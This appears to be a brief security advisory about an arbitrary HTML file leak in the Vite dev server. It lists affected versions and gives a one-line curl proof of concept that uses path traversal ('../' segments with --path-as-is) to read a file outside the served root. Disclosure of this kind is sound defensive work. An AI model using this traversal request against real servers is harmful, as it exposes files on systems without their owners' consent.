Vite arbitrary remote HTML file leak
>=7.1.0,<=7.1.4
>=7.0.0,<=7.0.6
>=6.0.0,<=6.3.5
<=5.4.19
This vulnerability allows a remote attacker to leak any HTML file on the system.
Assuming a vite server is running on localhost, and somefile.html exists at the root directory
curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../somefile.html'
No mitigations are supplied for this vulnerability